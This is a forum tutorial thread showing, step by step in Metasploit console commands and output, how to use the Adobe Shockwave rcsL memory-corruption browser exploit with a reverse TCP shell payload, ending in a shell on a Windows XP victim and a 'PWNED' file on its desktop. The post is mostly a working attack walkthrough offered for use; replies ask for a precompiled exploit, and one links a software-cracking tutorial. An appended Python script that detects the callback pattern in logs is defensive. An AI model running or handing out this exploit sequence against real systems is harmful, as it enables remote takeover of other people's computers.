Well folks, I bring you adobe_shockwave_rcsl_corruption, a 0day that came out recently (21/10/2010) and that you can already enjoy courtesy of the Metasploit people, who don't miss a thing. From what I've been reading it works on XP as well as on Vista and Seven (I only tested it on XP). The tutorial was made by rus0pr0; I was going to write one myself, but he beat me to it. For anyone who wants a bit more information, here is the link:

[External link removed for guests]


OK, let's get to the fun part: sudo ./msfconsole and off we go:


Code:

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 615 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10780 updated today (2010.10.22)

msf > use  windows/browser/adobe_shockwave_rcsl_corruption
msf exploit(adobe_shockwave_rcsl_corruption) > info

       Name: Adobe Shockwave rcsL Memory Corruption
    Version: 10779
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  David Kennedy "ReL1K" <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)

Payload information:
  Space: 1024
  Avoid: 4 characters

Description:
  This module exploits a weakness in the Adobe Shockwave player's 
  handling of Director movies (.DIR). A memory corruption 
  vulnerability occurs through an undocumented rcsL chunk. This 
  vulnerability was discovered by http://www.abysssec.com.

References:
  http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip



Let's look at the payloads we can use:


Code:

msf exploit(adobe_shockwave_rcsl_corruption) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective Dll Injection, Bind TCP Stager
   windows/dllinject/reverse_http                                    normal  Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective Dll Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
   windows/download_exec                                             normal  Windows Executable Download and Execute
   windows/exec                                                      normal  Windows Execute Command
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)


We set the payload, fill in the information we need and check that everything is OK:


Code:

msf exploit(adobe_shockwave_rcsl_corruption) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(adobe_shockwave_rcsl_corruption) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(adobe_shockwave_rcsl_corruption) > set URIPATH /
URIPATH => /
msf exploit(adobe_shockwave_rcsl_corruption) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_shockwave_rcsl_corruption) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.101    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



All good, let's run the exploit:

Code:

msf exploit(adobe_shockwave_rcsl_corruption) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.101:4444 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.101:80/
[*] Server started.

We point the browser at the address:





Code:

msf exploit(adobe_shockwave_rcsl_corruption) > [*] Sending exploit HTML to 192.168.1.100:1051...
[*] Sending exploit DIR to 192.168.1.100:1054...
[*] Sending stage (240 bytes) to 192.168.1.100
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1055) at Fri Oct 22 07:22:58 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1055) processing InitialAutoRunScript 'migrate -f'
[-] Error: Command shell sessions do not support migration


We already have a shell (ignore the error: when the shell comes up it tries to migrate it to another process as if it were meterpreter, but that can't be done with a plain shell).

Now we look at the available sessions, interact with one, leave the victim a greeting on the desktop and log off.

Code:

msf exploit(adobe_shockwave_rcsl_corruption) > sessions

Active sessions
===============

  Id  Type   Information  Connection
  --  ----   -----------  ----------
  1   shell               192.168.1.101:4444 -> 192.168.1.100:1055

msf exploit(adobe_shockwave_rcsl_corruption) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>echo "PWNED :), hasta la proxima" > pwned.txt
echo "PWNED :), hasta la proxima" > pwned.txt

C:\Documents and Settings\Administrator\Desktop>[*] Command shell session 1 closed.

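For anyone looking at this from the defending side: the session above leaves a recognisable trail (a client fetches a page and a Director movie from a host, then opens a TCP connection back to that same host on an unrelated port such as 4444). The script below is an example added here, not part of this post or of Metasploit; it correlates proxy and firewall logs to flag that pattern. The log formats, the sample lines (built from the addresses shown in this thread) and the use of the `application/x-director` MIME type and `.dir`/`.dcr`/`.dxr` extensions as the Director signal are assumptions made for the example.

```python
"""
Correlate proxy and firewall logs to spot the browser-exploit-server pattern:
a Director movie fetched from a host, followed shortly by a TCP connection
from the same client back to that host on a different port.

Example code added for illustration; not from the forum post or Metasploit.
Log formats and sample lines are constructed for this example.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed proxy log format: "<iso-time> <client-ip> <method> <url> <content-type>"
PROXY_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")
# Constructed firewall log format: "<iso-time> <src-ip> -> <dst-ip>:<dst-port> <proto>"
FW_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (\S+)$")

# Assumption: Director movies are served as application/x-director and/or
# carry one of these extensions.
DIRECTOR_TYPES = {"application/x-director"}
DIRECTOR_EXTS = (".dir", ".dcr", ".dxr")


def director_fetches(proxy_lines):
    """Yield (time, client, server_host, server_port) for every Director movie fetch."""
    for line in proxy_lines:
        m = PROXY_RE.match(line.strip())
        if not m:
            continue
        ts, client, _method, url, ctype = m.groups()
        u = urlparse(url)
        host = u.hostname or ""
        port = u.port or (443 if u.scheme == "https" else 80)
        if ctype.lower() in DIRECTOR_TYPES or u.path.lower().endswith(DIRECTOR_EXTS):
            yield datetime.fromisoformat(ts), client, host, port


def callbacks(fw_lines):
    """Yield (time, src, dst, dport, proto) for every firewall connection record."""
    for line in fw_lines:
        m = FW_RE.match(line.strip())
        if not m:
            continue
        ts, src, dst, dport, proto = m.groups()
        yield datetime.fromisoformat(ts), src, dst, int(dport), proto.lower()


def find_suspects(proxy_lines, fw_lines, window_seconds=120):
    """Return [(client, server, fetch_port, callback_port)] for each client that fetched
    a Director movie and, within the window, opened a TCP connection to the same host
    on a port other than the one it fetched from (the reverse-shell callback).

    Matching is by the literal host string, so it only joins when the URL host is an
    IP address, as in the session in this thread; a production version would resolve
    hostnames or use the proxy's recorded server IP."""
    hits = []
    cbs = list(callbacks(fw_lines))
    for fetch_t, client, server, fetch_port in director_fetches(proxy_lines):
        deadline = fetch_t + timedelta(seconds=window_seconds)
        for cb_t, src, dst, dport, proto in cbs:
            if (src == client and dst == server and proto == "tcp"
                    and dport != fetch_port and fetch_t <= cb_t <= deadline):
                hits.append((client, server, fetch_port, dport))
    return hits


# Constructed sample data, modelled on the addresses and ports shown in this thread.
SAMPLE_PROXY = [
    "2010-10-22T07:22:50 192.168.1.100 GET http://192.168.1.101:80/ text/html",
    "2010-10-22T07:22:52 192.168.1.100 GET http://192.168.1.101:80/movie.dir application/x-director",
    "2010-10-22T07:30:00 192.168.1.100 GET http://www.example.com/intro.dir application/x-director",
]
SAMPLE_FW = [
    "2010-10-22T07:22:55 192.168.1.100 -> 192.168.1.101:4444 TCP",
    "2010-10-22T07:31:00 192.168.1.100 -> 203.0.113.5:443 TCP",
]

if __name__ == "__main__":
    for client, server, fport, cport in find_suspects(SAMPLE_PROXY, SAMPLE_FW):
        print(f"ALERT {client} fetched Director content from {server}:{fport} "
              f"then connected back to {server}:{cport}")
```

The second Director fetch in the sample (a legitimate-looking movie from a named host with no follow-up connection) is deliberately not flagged, which is the point of correlating the two logs rather than alerting on every `.dir` download.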



---


Let's go, INDETECTABLES!!
Excellent, Skillmax.
It will help me a lot since I'm just getting started with Metasploit!
Cheers!

♪♪ 2pac & Notorious B.I.G ♪♪
Why am I fighting to live when I'm only living to fight,
Why am I trying to see when there's nothing in sight,
Why am I trying to give when nobody gives me a chance,
Why am I dying to live when I'm living to die. ♪♪
droopy wrote: Could you upload the exploit already compiled?
I don't know how to use Metasploit.
Thanks
Have you read the whole post?
Good luck, friend, and if you want to use exploits I recommend 2 things:
1) Download Metasploit (it's free)
2) Look for manuals and read, read a lot... the road is long
Sorry, I don't know much about this. Where is the remote IP configured? I don't understand how it works.
Mega Tutorial for cracking ANY program or game --> http://tinyurl.com/tutorial-cracking